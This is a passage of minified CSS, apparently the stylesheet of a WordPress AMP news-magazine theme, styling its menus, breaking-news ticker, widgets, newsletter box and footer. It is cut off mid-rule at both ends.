#aaa}button:active,button:focus,input[type=button]:active,input[type=button]:focus,input[type=reset]:active,input[type=reset]:focus,input[type=submit]:active,input[type=submit]:focus{border-color:#aaa #bbb #bbb}input[type=text],input[type=email],input[type=url],input[type=password],input[type=search],input[type=number],input[type=tel],input[type=range],input[type=date],input[type=month],input[type=week],input[type=time],input[type=datetime],input[type=datetime-local],input[type=color]{color:#666;border:1px solid #ccc;border-radius:3px;padding:3px}input[type=text]:focus,input[type=email]:focus,input[type=url]:focus,input[type=password]:focus,input[type=search]:focus,input[type=number]:focus,input[type=tel]:focus,input[type=range]:focus,input[type=date]:focus,input[type=month]:focus,input[type=week]:focus,input[type=time]:focus,input[type=datetime]:focus,input[type=datetime-local]:focus,input[type=color]:focus{color:#111}a{color:royalblue}a:visited{color:purple}a:hover,a:focus,a:active{color:midnightblue}a:hover,a:focus,a:active{outline:0}a:focus-visible{outline:thin dotted}.screen-reader-text{border:0;clip:rect(1px,1px,1px,1px);clip-path:inset(50%);height:1px;margin:-1px;overflow:hidden;padding:0;width:1px}.screen-reader-text:not(#_#_#_#_#_#_#_){position:absolute;word-wrap:normal}.screen-reader-text:focus{background-color:#f1f1f1;border-radius:3px;box-shadow:0 0 2px 2px rgba(0,0,0,.6);clip-path:none;color:#21759b;display:block;font-size:14px;font-size:.875rem;font-weight:bold;height:auto;left:5px;line-height:normal;padding:15px 23px 14px;text-decoration:none;top:5px;width:auto;z-index:100000}.screen-reader-text:focus:not(#_#_#_#_#_#_#_){clip:auto}#content[tabindex="-1"]:focus{outline:0}.entry-content:before,.entry-content:after,.site-header:before,.site-header:after,.site-content:before,.site-content:after,.site-footer:before,.site-footer:after{content:"";display:table;table-layout:fixed}.entry-content:after,.site-header:after,.site-content:after,.site-footer:after{clear:both}.entry-content{margin:1.5em 0 0}.custom-logo-link{display:inline-block}.wp-caption{margin-bottom:1.5em;max-width:100%}.wp-caption amp-img[class*=wp-image-]{display:block;margin-left:auto;margin-right:auto}.wp-caption .wp-caption-text{margin:.8075em 0}.wp-caption-text{text-align:center}@-webkit-keyframes scale-in-center{0%{transform:scale(0);-webkit-transform:scale(0);-moz-transform:scale(0);opacity:1}100%{transform:scale(1);-webkit-transform:scale(1);-moz-transform:scale(1);opacity:1}}@-moz-keyframes scale-in-center{0%{transform:scale(0);-webkit-transform:scale(0);-moz-transform:scale(0);opacity:1}100%{transform:scale(1);-webkit-transform:scale(1);-moz-transform:scale(1);opacity:1}}@keyframes scale-in-center{0%{transform:scale(0);-webkit-transform:scale(0);-moz-transform:scale(0);opacity:1}100%{transform:scale(1);-webkit-transform:scale(1);-moz-transform:scale(1);opacity:1}}@-webkit-keyframes rotate-center{0%{transform:rotate(0);-webkit-transform:rotate(0);-moz-transform:rotate(0)}100%{transform:rotate(360deg);-webkit-transform:rotate(360deg);-moz-transform:rotate(360deg)}}@-moz-keyframes rotate-center{0%{transform:rotate(0);-webkit-transform:rotate(0);-moz-transform:rotate(0)}100%{transform:rotate(360deg);-webkit-transform:rotate(360deg);-moz-transform:rotate(360deg)}}@keyframes rotate-center{0%{transform:rotate(0);-webkit-transform:rotate(0);-moz-transform:rotate(0)}100%{transform:rotate(360deg);-webkit-transform:rotate(360deg);-moz-transform:rotate(360deg)}}@-webkit-keyframes rotate-partial{0%{transform:rotate(0);-webkit-transform:rotate(0);-moz-transform:rotate(0)}100%{transform:rotate(90deg);-webkit-transform:rotate(90deg);-moz-transform:rotate(90deg)}}@-moz-keyframes rotate-partial{0%{transform:rotate(0);-webkit-transform:rotate(0);-moz-transform:rotate(0)}100%{transform:rotate(90deg);-webkit-transform:rotate(90deg);-moz-transform:rotate(90deg)}}@keyframes rotate-partial{0%{transform:rotate(0);-webkit-transform:rotate(0);-moz-transform:rotate(0)}100%{transform:rotate(90deg);-webkit-transform:rotate(90deg);-moz-transform:rotate(90deg)}}@-webkit-keyframes time{100%{transform:rotate(360deg);-webkit-transform:rotate(360deg);-moz-transform:rotate(360deg)}}@-moz-keyframes time{100%{transform:rotate(360deg);-webkit-transform:rotate(360deg);-moz-transform:rotate(360deg)}}@keyframes time{100%{transform:rotate(360deg);-webkit-transform:rotate(360deg);-moz-transform:rotate(360deg)}}.twp-breadcrumbs ul,.widget ul,.twp-related-post-list,.desktop .twp-nav-menu ul,.twp-mobile-menu ul,.twp-categories-with-bg ul{list-style:none;margin:0;padding:0}.widget .search-form:before,.twp-ticket-pin:before,#content:before,.clearfix:before,.widget .search-form:after,.twp-ticket-pin:after,#content:after,.clearfix:after{clear:both;content:"";display:block}.twp-footer-widget-section .widget .search-form .search-submit,.twp-navigation .twp-nav-menu-section:after,.twp-topbar .twp-title-with-arrow,.twp-close-icon span,.twp-categories-with-bg.twp-categories-with-bg-primary a,.twp-title-with-dashed:before,.widget-title:before{background-color:#ff0036}.twp-article-post .single-excerpt p{border-color:#ff0036}.twp-single-next-post,.desktop div.twp-nav-menu > ul > li > a,.desktop ul.twp-nav-menu > li > a,.twp-overlay{transform:perspective(1px) translateZ(0)}.desktop div.twp-nav-menu > ul > li > a,.desktop ul.twp-nav-menu > li > a,.twp-overlay{position:relative;z-index:1}.desktop div.twp-nav-menu > ul > li > a:before,.desktop ul.twp-nav-menu > li > a:before,.twp-overlay:before{position:absolute;display:block;left:0;right:0;top:0;bottom:0;z-index:-1}.twp-float-left{float:left}.clearfix:before,.clearfix:after{clear:both;content:"";display:block}.twp-d-flex{display:flex;flex-wrap:wrap}.d-block{display:block}amp-img{vertical-align:middle;max-width:100%;height:auto}.data-bg{background-size:cover;background-repeat:no-repeat;background-position:center;display:block;background-color:#7b7b7b}.twp-bg-light-gray{background-color:#f8f9fa}.twp-image-hover{overflow:hidden}.twp-image-hover a{transition:transform .3s linear;-webkit-transition:transform .3s linear;-moz-transition:transform .3s linear;backface-visibility:hidden;-webkit-backface-visibility:hidden;-moz-backface-visibility:hidden}.twp-image-hover a:hover{transform:scale(1.1,1.1);-webkit-transform:scale(1.1,1.1);-moz-transform:scale(1.1,1.1)}.container{padding-left:15px;padding-right:15px;width:100%;max-width:100%}@media (min-width: 1350px){.container{margin:0 auto;max-width:1300px}}@media (min-width: 1450px){.container{max-width:1400px}}.twp-row{display:flex;flex-wrap:wrap;margin-left:-7.5px;margin-right:-7.5px}.twp-col-4{padding-left:7.5px;padding-right:7.5px;flex:0 0 100%;max-width:100%}@media (min-width: 768px){.twp-col-4{flex:0 0 50%;max-width:50%}}@media (min-width: 1050px){.twp-col-4{flex:0 0 33.33%;max-width:33.33%}}#content{width:100%;margin:0 auto;max-width:100%}@media (min-width: 1350px){#content{margin:0 auto;max-width:1300px}}@media (min-width: 1450px){#content{max-width:1400px}}#content #primary{padding-left:15px;padding-right:15px}@media (min-width: 992px){#content #primary{float:left;width:60%}}@media (min-width: 1050px){#content #primary{width:70%;padding-right:15px;padding-left:0}}#content #secondary{padding-left:15px;padding-right:15px}@media (min-width: 992px){#content #secondary{float:right;width:40%}}@media (min-width: 1050px){#content #secondary{width:30%;padding-left:15px;padding-right:0}}.right-sidebar #content #primary{padding-left:15px;padding-right:15px}@media (min-width: 992px){.right-sidebar #content #primary{float:left;width:60%}}@media (min-width: 1050px){.right-sidebar #content #primary{padding-right:15px;padding-left:0;width:70%}}.right-sidebar #content #secondary{padding-left:15px;padding-right:15px}@media (min-width: 992px){.right-sidebar #content #secondary{float:right;width:40%}}@media (min-width: 1050px){.right-sidebar #content #secondary{padding-left:15px;padding-right:0;width:30%}}html{font-size:16px;font-family:"Raleway";font-weight:400}html body{color:black;font-family:"Raleway"}html body input,html body button{font-family:inherit}a{text-decoration:none;color:black;transition:all .3s linear;-webkit-transition:all .3s linear;-moz-transition:all .3s linear}a:visited{color:black}a:hover{color:#ff0036}p a{color:#ff0036}p a:visited,p a:hover{color:#ff0036}p a:hover{font-weight:800}.twp-author-meta{display:flex;align-items:center;font-weight:600;flex-wrap:wrap;margin-left:-5 x;margin-right:-5px;font-size:14px;font-style:italic}.twp-author-meta span,.twp-author-meta a{display:inline-block}.twp-author-meta .twp-author-caption,.twp-author-meta .twp-post-date{padding-left:5px;padding-right:5px}.twp-author-meta .twp-author-image{width:35px;margin-left:5px;margin-right:5px;vertical-align:middle}.twp-author-meta .twp-author-image amp-img{border-radius:100%}.twp-title-with-dashed,.widget-title{position:relative;padding-left:10px;line-height:1}.twp-title-with-dashed:before,.widget-title:before{position:absolute;content:"";left:0;top:0;height:100%;width:4px}.twp-categories-with-bg ul.cat-links{margin-left:-5px;margin-right:-5px}.twp-categories-with-bg ul.cat-links li{padding-left:5px;padding-right:5px}.twp-categories-with-bg ul li{line-height:1;display:inline-block}.twp-categories-with-bg ul li a{display:inline-block;height:25px;padding:0 5px;line-height:25px;font-size:.9rem;transition:all .3s linear;-webkit-transition:all .3s linear;-moz-transition:all .3s linear;font-weight:600;position:relative}.twp-categories-with-bg ul li a:before{content:"";position:absolute;top:100%;left:0;border-right:4px solid;border-bottom:4px solid transparent;width:0;z-index:1}.twp-categories-with-bg ul li a:visited{color:white}.twp-categories-with-bg ul li a:hover{color:#cfd8dc}.twp-categories-with-bg.twp-categories-with-bg-primary a{color:white}.twp-categories-with-bg.twp-categories-with-bg-primary a:before{border-right-color:#ff0036}.twp-close-icon{width:50px;position:relative;display:inline-block;cursor:pointer;height:100%;transition:all .3s linear;-webkit-transition:all .3s linear;-moz-transition:all .3s linear;vertical-align:middle}@media (min-width: 1050px){.twp-close-icon:hover{-webkit-animation:rotate-center .3s linear both;-o-animation:rotate-center .3s linear both;-moz-animation:rotate-center .3s linear both;animation:rotate-center .3s linear both}}.twp-close-icon.twp-close-icon-sm{width:20px}.twp-close-icon.twp-close-icon-sm span{width:20px}.twp-close-icon span{display:block;position:absolute;width:30px;height:3px;z-index:5;top:50%;border-radius:5px;transform:rotate(45deg)}.twp-close-icon span:last-child{transform:rotate(135deg)}.twp-close-icon.twp-close-icon-white span{background-color:white}@media (min-width: 1050px){.twp-close-icon.twp-rotate-90:hover{-webkit-animation:rotate-partial .3s linear both;-o-animation:rotate-partial .3s linear both;-moz-animation:rotate-partial .3s linear both;animation:rotate-partial .3s linear both}}.twp-menu-icon{position:relative;height:20px;width:30px;cursor:pointer;transition:all .3s linear;-webkit-transition:all .3s linear;-moz-transition:all .3s linear}.twp-menu-icon:before{position:absolute;display:block;content:"";height:3px;width:80%;left:0;top:50%;transform:translateY(-50%)}.twp-menu-icon span:before,.twp-menu-icon span:after{position:absolute;display:block;content:"";height:3px;width:100%;left:0}.twp-menu-icon span:before{top:1px}.twp-menu-icon span:after{bottom:1px}.twp-menu-icon.twp-menu-icon-white:before{background-color:white}.twp-menu-icon.twp-menu-icon-white span:before,.twp-menu-icon.twp-menu-icon-white span:after{background-color:white}.twp-mobile-menu{position:fixed;width:100%;height:100%;z-index:10;top:0;bottom:0;left:-100%;background-color:black;padding:30px;color:white;overflow-y:auto;transition:all .5s ease}@media (min-width: 768px){.twp-mobile-menu{width:300px}}.twp-mobile-menu .twp-mobile-close-icon{text-align:right}.twp-mobile-menu ul li a{display:block;font-weight:600;font-size:1.2rem;line-height:1;padding:10px 0;color:white}.twp-mobile-menu ul .sub-menu{padding-left:15px}.twp-mobile-menu ul .sub-menu a{font-size:14px}.twp-mobile-menu .brand-home{display:none}.twp-body-overlay{transition:all .3s linear;-webkit-transition:all .3s linear;-moz-transition:all .3s linear}.twp-overlay:before{content:"";background-color:rgba(248,249,250,.6)}.twp-overlay.twp-overlay-bg-black:before{background-color:rgba(0,0,0,.6)}.twp-scroll-top{display:none;transition:all 1s ease;-webkit-transition:all 1s ease;-moz-transition:all 1s ease}@media (min-width: 768px){.twp-scroll-top{position:fixed;z-index:2;right:-200px;display:block;bottom:30px}}.twp-scroll-top span{display:inline-block;background-color:black;color:white;padding:5px 10px;font-size:20px}@media (min-width: 1050px){.twp-scroll-top span{padding:10px 15px}}.twp-scroll-top span i{transition:all .3s linear;-webkit-transition:all .3s linear;-moz-transition:all .3s linear}.twp-scroll-top span:hover{background-color:#ff0036}.twp-scroll-top span:hover i{transform:scale(1.2);-webkit-transform:scale(1.2);-moz-transform:scale(1.2)}.twp-search-field-wrapper{display:flex;flex-wrap:wrap}@media (min-width: 1050px){.twp-search-field-wrapper{max-width:700px;margin:0 auto}}.twp-search-field-wrapper .twp-search-field{flex:0 0 calc(100% - 50px);max-width:calc(100% - 50px)}.twp-search-field-wrapper .twp-search-field form{display:flex;flex-wrap:wrap}.twp-search-field-wrapper .twp-search-field form label{flex:0 0 70%;max-width:70%}.twp-search-field-wrapper .twp-search-field form label input{width:100%;border:0;border-radius:0;padding:15px 30px;background-color:white}.twp-search-field-wrapper .twp-search-field form input[type=submit]{width:30%;color:white;background-color:black;border:0;cursor:pointer;font-size:1rem;padding:0 15px;font-weight:600;border-radius:0}@media (min-width: 768px){.twp-search-field-wrapper .twp-search-field form input[type=submit]{font-size:20px}}.twp-search-field-wrapper .twp-close-icon-section{flex:0 0 50px;max-width:50px;padding-left:10px;padding-right:10px}.twp-social-share-section{display:flex;flex-wrap:wrap}.twp-social-share-section .twp-author-meta{padding-top:10px}.twp-social-share-section .twp-author-meta.m-0{margin-left:0;margin-right:0}.twp-topbar .twp-title-with-arrow{vertical-align:middle;padding:0 30px;position:relative;height:40px;line-height:40px;color:white;z-index:1}.twp-topbar .twp-title-with-arrow:after{content:"";display:block;position:absolute;top:50%;right:-20px;transform:translateY(-50%);border-style:solid;border-width:10px;border-color:transparent transparent transparent #ff0036}.twp-topbar .twp-current-date{height:40px;line-height:40px;padding:0 15px;background-color:black;color:white;vertical-align:middle;width:100%;text-align:center}@media (min-width: 576px){.twp-topbar .twp-current-date{width:initial;text-align:initial}}.twp-topbar{background-color:#cfd8dc}.twp-topbar .twp-breaking-news-section a{color:black}.twp-topbar .twp-breaking-news-section a:visited{color:black}.twp-topbar .twp-breaking-news-section a:hover{color:#ff0036}.twp-breaking-news-section .twp-ticket-pin-slider:not(.slick-initialized){opacity:0;visibility:hidden;max-height:40px;transition:opacity 1s ease;-webkit-transition:opacity 1s ease}.twp-breaking-news-section .twp-ticket-pin-slider{visibility:visible;opacity:1;transition:opacity 1s ease;-webkit-transition:opacity 1s ease}@media (min-width: 576px){.twp-topbar{height:40px}}.twp-topbar .twp-topbar-content-left{width:100%}@media (min-width: 576px){.twp-topbar .twp-topbar-content-left{width:calc(100% - 300px)}}.twp-topbar .twp-topbar-content-left .twp-title-with-arrow{display:none}@media (min-width: 1050px){.twp-topbar .twp-topbar-content-left .twp-title-with-arrow{display:block}}.twp-topbar .twp-topbar-content-left .twp-breaking-news-section{height:40px;overflow:hidden;display:none}@media (min-width: 768px){.twp-topbar .twp-topbar-content-left .twp-breaking-news-section{display:block}}.twp-navigation .twp-nav-menu-section .twp-site-features .header-theme-mode a,.twp-navigation .twp-nav-menu-section .twp-site-features .twp-search,.twp-navigation .twp-nav-menu-section .twp-site-features .twp-trending{padding:0 15px;height:40px;line-height:40px;background-color:white;color:black;cursor:pointer;transition:all .3s linear;-webkit-transition:all .3s linear;-moz-transition:all .3s linear}.twp-navigation .twp-nav-menu-section .twp-site-features .header-theme-mode a:hover,.twp-navigation .twp-nav-menu-section .twp-site-features .twp-search:hover,.twp-navigation .twp-nav-menu-section .twp-site-features .twp-trending:hover{background-color:#cfd8dc}.twp-navigation .twp-article-list{display:none;background-color:white;color:black}.twp-navigation .twp-article-list a{line-height:1.2;color:black}.twp-navigation .twp-article-list a:visited{color:black}.twp-navigation .twp-article-list a:hover{color:#ff0036}.desktop ul.twp-nav-menu{display:flex;flex-wrap:wrap}.desktop ul.twp-nav-menu > li a{position:relative;display:block}.desktop ul.twp-nav-menu > li > a:before{background-color:white;-webkit-animation:scale-in-center .5s cubic-bezier(.25,.46,.45,.94) both;-o-animation:scale-in-center .5s cubic-bezier(.25,.46,.45,.94) both;-moz-animation:scale-in-center .5s cubic-bezier(.25,.46,.45,.94) both;animation:scale-in-center .5s cubic-bezier(.25,.46,.45,.94) both}.desktop ul.twp-nav-menu > li > a:hover{color:black}.desktop ul.twp-nav-menu > li > a:hover:before{content:""}.desktop .twp-nav-menu a{text-transform:uppercase;font-size:13px;padding:0 15px;height:40px;line-height:40px;color:white;font-weight:800}.desktop .twp-nav-menu .brand-home a{position:relative;color:black;background-color:white;font-size:35px}.desktop .twp-nav-menu .brand-home a:before{position:absolute;width:100%;height:5px;content:"";display:block;left:0;top:-5px;background-color:black}.desktop .twp-nav-menu .brand-home a:hover{background-color:#cfd8dc}.desktop ul.twp-nav-menu > li{position:relative}.desktop ul.twp-nav-menu > li .sub-menu{position:absolute;top:110%;left:0;width:220px;background-color:black;opacity:0;height:0;overflow:hidden;visibility:hidden;transition:all 1s ease;-webkit-transition:all 1s ease;-moz-transition:all 1s ease;z-index:3}.desktop ul.twp-nav-menu > li .sub-menu a{display:block;border-left-style:solid;border-left-width:1px;border-top-style:solid;border-top-width:1px;border-color:#cfd8dc;color:white}.desktop ul.twp-nav-menu > li .sub-menu a:visited{color:white}.desktop ul.twp-nav-menu > li .sub-menu a:hover{color:#cfd8dc}.desktop ul.twp-nav-menu > li:hover .sub-menu,.desktop ul.twp-nav-menu > li:focus-within .sub-menu{top:100%;opacity:1;height:auto;overflow:visible;visibility:visible}.desktop ul.twp-nav-menu > li{position:relative}.desktop ul.twp-nav-menu > li .sub-menu > li{position:relative}.desktop ul.twp-nav-menu > li .sub-menu > li .sub-menu{top:20%;left:100%;overflow:hidden;visibility:hidden;transition:all 1s ease;-webkit-transition:all 1s ease;-moz-transition:all 1s ease}.desktop ul.twp-nav-menu > li .sub-menu > li:hover .sub-menu,.desktop ul.twp-nav-menu > li .sub-menu > li:focus-within .sub-menu{opacity:1;height:auto;top:0;overflow:visible;visibility:visible}.desktop ul.twp-nav-menu > li{position:relative}.desktop ul.twp-nav-menu > li .sub-menu > li{position:relative}.desktop ul.twp-nav-menu > li .sub-menu > li .sub-menu{top:20%;left:100%;overflow:hidden;visibility:hidden;transition:all 1s ease;-webkit-transition:all 1s ease;-moz-transition:all 1s ease}.desktop ul.twp-nav-menu > li .sub-menu > li:hover .sub-menu,.desktop ul.twp-nav-menu > li .sub-menu > li:focus-within .sub-menu{opacity:1;height:auto;top:0;overflow:visible;visibility:visible}.desktop ul.twp-nav-menu > li{position:relative}.desktop ul.twp-nav-menu > li .sub-menu > li{position:relative}.desktop ul.twp-nav-menu > li .sub-menu > li .sub-menu > li .sub-menu{top:20%;left:100%;overflow:hidden;visibility:hidden;transition:all 1s ease;-webkit-transition:all 1s ease;-moz-transition:all 1s ease}.desktop ul.twp-nav-menu > li .sub-menu > li .sub-menu > li:hover .sub-menu,.desktop ul.twp-nav-menu > li .sub-menu > li .sub-menu > li:focus-within .sub-menu{opacity:1;height:auto;overflow:visible;visibility:visible;top:0}.desktop div.twp-nav-menu > ul{display:flex;flex-wrap:wrap}.desktop div.twp-nav-menu > ul > li{position:relative}.desktop div.twp-nav-menu > ul > li a{position:relative;display:block}.desktop div.twp-nav-menu > ul > li > a:before{background-color:white;-webkit-animation:scale-in-center .5s cubic-bezier(.25,.46,.45,.94) both;-o-animation:scale-in-center .5s cubic-bezier(.25,.46,.45,.94) both;-moz-animation:scale-in-center .5s cubic-bezier(.25,.46,.45,.94) both;animation:scale-in-center .5s cubic-bezier(.25,.46,.45,.94) both}.desktop div.twp-nav-menu > ul > li > a:hover{color:black}.desktop div.twp-nav-menu > ul > li > a:hover:before{content:""}.twp-nav-menu-section .twp-progress-bar{position:absolute;left:0;height:8px;bottom:-8px;background-color:#cfd8dc;z-index:2;transition:width .2s ease;-webkit-transition:width .2s ease;-moz-transition:width .2s ease}.twp-navigation .twp-search-field-section{background:#cfd8dc;padding:30px 0;display:none}@media (min-width: 576px){.twp-navigation .twp-search-field-section{padding:30px}}.twp-navigation .twp-nav-menu-section{background-color:black;position:relative}.twp-navigation .twp-nav-menu-section:after{position:absolute;content:"";height:8px;width:100%;display:block;left:0;bottom:-8px}.twp-navigation .twp-nav-menu-section .twp-wrapper{justify-content:space-between;margin-left:-15px;margin-right:-15px;flex-wrap:nowrap}.twp-navigation .twp-nav-menu-section .twp-menu-section,.twp-navigation .twp-nav-menu-section .twp-site-features{padding-left:15px;padding-right:15px}.twp-navigation .twp-nav-menu-section .twp-menu-section{align-items:center}.twp-navigation .twp-nav-menu-section .twp-menu-section .twp-nav-menu li{display:none}@media (min-width: 1050px){.twp-navigation .twp-nav-menu-section .twp-menu-section .twp-nav-menu li{display:block}}.twp-navigation .twp-nav-menu-section .twp-menu-section .twp-nav-menu li.brand-home{display:block}.twp-navigation .twp-nav-menu-section .twp-menu-section .twp-menu-icon-section{padding:0 15px}@media (min-width: 1050px){.twp-navigation .twp-nav-menu-section .twp-menu-section .twp-menu-icon-section{display:none}}.twp-navigation .twp-nav-menu-section .twp-site-features{display:flex;flex-wrap:wrap;flex-shrink:0}.twp-navigation .twp-nav-menu-section .twp-site-features .twp-search,.twp-navigation .twp-nav-menu-section .twp-site-features .twp-trending{padding:0 15px}.twp-navigation .twp-nav-menu-section .twp-site-features .twp-search a,.twp-navigation .twp-nav-menu-section .twp-site-features .twp-trending a{color:black}.twp-navigation .twp-nav-menu-section .twp-site-features .header-theme-mode a{display:inline-block;color:black}.twp-navigation .twp-nav-menu-section .twp-site-features .twp-trending{background-color:#ff0036;color:white;padding:0 20px}.twp-navigation .twp-nav-menu-section .twp-site-features .twp-trending:hover{background-color:black}.twp-navigation .twp-nav-menu-section .twp-site-features i{line-height:1}.twp-article-list .twp-article-border{border-bottom-style:solid;border-bottom-width:1px;border-color:#cfd8dc;padding-top:10px;padding-bottom:10px}.twp-article-list .twp-article-border:hover{background-color:#f8f9fa}.twp-article{display:flex}.twp-article .twp-units{font-size:40px;padding:0 10px}.twp-article .twp-description{padding:0 10px}.twp-article .twp-description h4{margin:0}.twp-article .twp-description h4 a{line-height:1.2;color:black}.twp-article .twp-description h4 a:visited{color:black}.twp-article .twp-description h4 a:hover{color:#ff0036}.twp-related-post .twp-image-section,.twp-related-post .twp-desc{flex:0 0 100%;max-width:100%}.twp-related-post .twp-image-section{min-height:200px}@media (min-width: 768px){.twp-related-post .twp-image-section{flex:0 0 30%;max-width:30%}}.twp-related-post .twp-image-section a{height:100%}.twp-related-post .twp-desc{padding:30px 15px}@media (min-width: 768px){.twp-related-post .twp-desc{flex:70%;max-width:70%}}.twp-related-post .twp-desc h3{margin-top:10px;margin-bottom:0}.twp-related-post .twp-desc h3 a{overflow:hidden;text-overflow:ellipsis;display:-webkit-box;-webkit-box-orient:vertical;box-orient:vertical;line-clamp:2;-webkit-line-clamp:2;word-break:break-word}.twp-related-post .twp-desc .twp-categories-with-bg ul li{padding-top:10px}.twp-ticket-pin{padding:0 15px;height:40px}.twp-ticket-pin .ticket-pin-wrapper{display:-webkit-box;display:-moz-box;display:-ms-flexbox;display:-webkit-flex;display:flex;align-items:center}.twp-ticket-pin .twp-image-section{width:80px;background-color:gray;height:40px}.twp-ticket-pin .twp-image-section .data-bg{height:100%}.twp-ticket-pin .twp-articles-title{padding-left:10px;width:calc(100% - 80px);font-size:14px;font-weight:600;line-height:1.2}.twp-ticket-pin .twp-articles-title a{overflow:hidden;text-overflow:ellipsis;display:-webkit-box;-webkit-box-orient:vertical;box-orient:vertical;line-clamp:2;-webkit-line-clamp:2;word-break:break-word}.twp-single-next-post{position:relative;z-index:1;padding:30px 15px 45px;border-bottom-style:solid;border-bottom-width:2px;border-color:#f8f9fa}.twp-single-next-post:before{position:absolute;content:"";display:block;left:0;right:0;bottom:0;z-index:1;height:150px;background:-webkit-linear-gradient(top,rgba(255,255,255,0) 0%,white 86%,white 87%,white 100%);background:linear-gradient(top,rgba(255,255,255,0) 0%,white 86%,white 87%,white 100%)}.twp-single-next-post .twp-next-post,.twp-single-next-post .twp-categories-with-bg,.twp-single-next-post .twp-author-meta,.twp-single-next-post .twp-caption{padding-top:15px}.twp-single-next-post .twp-next-post a{display:inline-block;font-weight:600}.twp-single-next-post .twp-next-post a i{padding:0 10px}.twp-single-next-post h2{margin-top:15px;margin-bottom:0;border-bottom-style:solid;border-bottom-width:2px;border-color:#f8f9fa;padding-bottom:5px}.twp-single-next-post .twp-caption{font-style:italic}.twp-single-next-post .twp-image-section{position:relative;height:200px;overflow:hidden;text-align:center;margin-top:15px}.twp-single-next-post .twp-image-section amp-img{box-shadow:0 0 5px 5px rgba(238,238,238,.6);border-radius:5px;padding:15px}.twp-related-post-section .twp-related-post,.twp-related-post-section .twp-title{margin-top:30px}.twp-related-post-section .twp-title{margin-bottom:0}@media (min-width: 1050px){.twp-related-post-section .twp-related-post-list{padding-left:60px}}.twp-article-post{box-shadow:0 0 10px 2px #cfd8dc;padding:0 15px 15px;margin-top:30px}.twp-article-post .entry-header .twp-categories-with-bg,.twp-article-post .entry-header .entry-title,.twp-article-post .entry-header .twp-author-meta{padding-top:15px}.twp-article-post .entry-header .entry-title{margin:0}.twp-article-post .single-excerpt p{margin-top:15px;margin-bottom:0;border-left-style:solid;border-left-width:4px;padding:15px;text-align:justify;font-style:italic}.twp-article-post .entry-content{margin:0}.twp-article-post .entry-content p{margin-top:15px;margin-bottom:0}.twp-article-post .entry-content h1,.twp-article-post .entry-content h2,.twp-article-post .entry-content h3,.twp-article-post .entry-content h4{margin-top:15px;margin-bottom:0}.widget ul{margin-left:-15px;margin-right:-15px}.widget ul li{padding:10px 15px;font-weight:600}.widget ul li:nth-child(odd){background-color:#f8f9fa}.widget ul li.menu-item-has-children{padding-bottom:0}.widget ul li.menu-item-has-children li{font-size:14px}.widget ul li.menu-item-has-children .sub-menu{margin-top:10px}.widget .twp-categories-with-bg li:nth-child(odd){background-color:transparent}.twp-footer-widget-section .widget li:nth-child(odd){background-color:transparent}.widget .search-form label{width:calc(100% - 90px);float:left;padding-right:5px}.widget .search-form label input{width:100%;height:45px;border-radius:0;padding:0 15px;border-color:#cfd8dc}.widget .search-form .search-submit{width:90px;height:45px;float:left;font-size:1rem;border-radius:0;border:0;cursor:pointer;font-weight:600;padding:0;background-color:black;color:white;transition:all .3s linear;-webkit-transition:all .3s linear;-moz-transition:all .3s linear}.widget .search-form .search-submit:hover{background-color:#ff0036}.twp-footer-widget-section .widget .search-form .search-submit:hover{background-color:white;color:black}.widget{border-style:solid;border-width:1px;border-color:#cfd8dc;margin-top:30px;padding:15px 15px 0}.widget.widget_search{padding-bottom:15px}.widget .widget-title{margin-bottom:15px;margin-top:0}.widget-area .widget .twp-col-4,.twp-footer-widget-section .widget .twp-col-4{flex:0 0 100%;max-width:100%;padding-left:0;padding-right:0}.widget-area .widget .container,.twp-footer-widget-section .widget .container{padding:0}.widget-area .widget .twp-row,.twp-footer-widget-section .widget .twp-row{margin:0}.site-content{padding:15px 0 45px 0}.twp-breadcrumbs{font-weight:600;padding:15px 0;background-color:#f8f9fa;border-bottom-style:solid;border-bottom-width:1px;border-color:#f8f9fa;margin-top:8px}.twp-breadcrumbs ul{display:flex;flex-wrap:wrap}.twp-breadcrumbs ul li{padding:0 60px 0 0;position:relative}.twp-breadcrumbs ul li:after{content:"";display:block;font-family:fontAwesome;position:absolute;right:23px;top:50%;transform:translateY(-50%);-webkit-transform:translateY(-50%);-moz-transform:translateY(-50%)}.twp-breadcrumbs ul li:last-child:after{display:none}.twp-footer-social-section{background-color:black;color:white}.twp-footer-social-section a{color:white}.twp-footer-social-section .twp-footer-social{padding-bottom:15px}.twp-footer-widget-section{background-color:black;color:white;padding-bottom:30px}.twp-footer-widget-section .twp-footer-border{border-bottom-style:solid;border-bottom-width:1px;border-color:white}.twp-footer-widget-section a{color:white}.twp-footer-widget-section a:visited{color:white}.twp-footer-widget-section a:hover{color:#ff0036}.twp-footer-widget-section .widget{border:0}.twp-footer-widget-section .twp-overlay:before{background-color:rgba(0,0,0,.6)}.site-footer{background-color:black;color:white;text-align:center;padding:15px;font-weight:600}.site-footer a{color:white}.site-footer a:hover{color:#ff0036}.twp-newsletter-section{background-color:#cfd8dc;z-index:2;transition:all 1s ease;-webkit-transition:all 1s ease;-moz-transition:all 1s ease;color:black;padding:30px}@media (min-width: 1050px){.twp-newsletter-section{width:500px;padding:5px 15px 15px;position:fixed;right:-50%;bottom:100px}}.twp-newsletter-section .twp-close-icon-section{display:none}@media (min-width: 1050px){.twp-newsletter-section .twp-close-icon-section{padding-top:10px;text-align:right;display:block}}.twp-newsletter-section h2,.twp-newsletter-section p{margin-top:10px;margin-bottom:0}.twp-site-branding{padding-top:15px;padding-bottom:30px}.twp-site-branding.data-bg{background-color:transparent}.twp-site-branding .twp-logo{text-align:center}.twp-site-branding .twp-logo .site-title,.twp-site-branding .twp-logo .site-description,.twp-site-branding .twp-logo .twp-image-wrapper{margin-top:15px;margin-bottom:0;line-height:1}.twp-site-branding .twp-logo .site-title{font-size:3rem}.twp-site-branding .twp-logo .site-description{font-size:1.5rem}.twp-site-branding .twp-logo amp-img,.twp-site-branding .twp-logo .site-title,.twp-site-branding .twp-logo .site-description{transition:all .3s linear;-webkit-transition:all .3s linear;-moz-transition:all .3s linear}.twp-site-branding .twp-logo amp-img:hover,.twp-site-branding .twp-logo .site-title:hover,.twp-site-branding .twp-logo .site-description:hover{transform:scale(.9);-webkit-transform:scale(.9);-moz-transform:scale(.9)}.twp-ad-section{background-color:black;padding:15px 0;text-align:center}.twp-ad-section .twp-ad amp-img{transition:all .3s linear;-webkit-transition:all .3s linear;-moz-transition:all .3s linear}.twp-ad-section .twp-ad amp-img:hover{transform:scale(.9);-webkit-transform:scale(.9);-moz-transform:scale(.9)}.twp-article-list{padding:30px 0}.twp-article-list .twp-article-header{padding:10px 15px;position:relative;background-color:#cfd8dc}.twp-article-list .twp-article-header h3{margin:0;color:black}.twp-article-list .twp-article-header 